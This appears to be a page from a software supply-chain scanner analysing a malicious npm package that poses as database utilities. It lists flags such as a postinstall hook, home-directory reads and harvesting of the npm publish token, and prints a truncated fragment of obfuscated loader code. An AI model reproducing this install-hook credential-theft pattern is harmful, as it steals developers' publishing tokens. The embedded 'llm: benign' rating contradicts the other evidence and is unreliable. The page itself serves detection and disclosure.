// npm package
@cloudplatform-single-spa/svp-s3-storage
Internal database utilities with connection pooling, query builder and migration support
versions: 3
maintainers: 1
license: UNLICENSED
first publish: 2026-05-27
publisher: mr.4nd3r50n
tarball: 17,331 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x76b63c=a0_0x45f0;(function(_0x11dc91,_0xe27a4c){const _0x253453=a0_0x45f0,_0x46e786=_0x11dc91();while(!![]){try{const _0xae591c=parseInt(_0x253453(0x236))/(-0x11d3+-0x1*-0x8ad+…

// publisher campaign
by mr.4nd3r50n
9 caught packages from this account
This is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code · @100.100.100 · 1 file flagged
llm: benign · 0.85
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n
  heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama
  - install-scripts:postinstall
  - new-publisher:1d
  - anomalous-major-version:100
  - publisher-multi-name-burst:24
  - publisher-version-pump:25
  - osv-flagged:MAL-2026-4988
  - reads-env-vars
  - reads-homedir
// NHI intent
1 target · mixed harvest patterns · gate: always
- npm publish token (.npmrc)
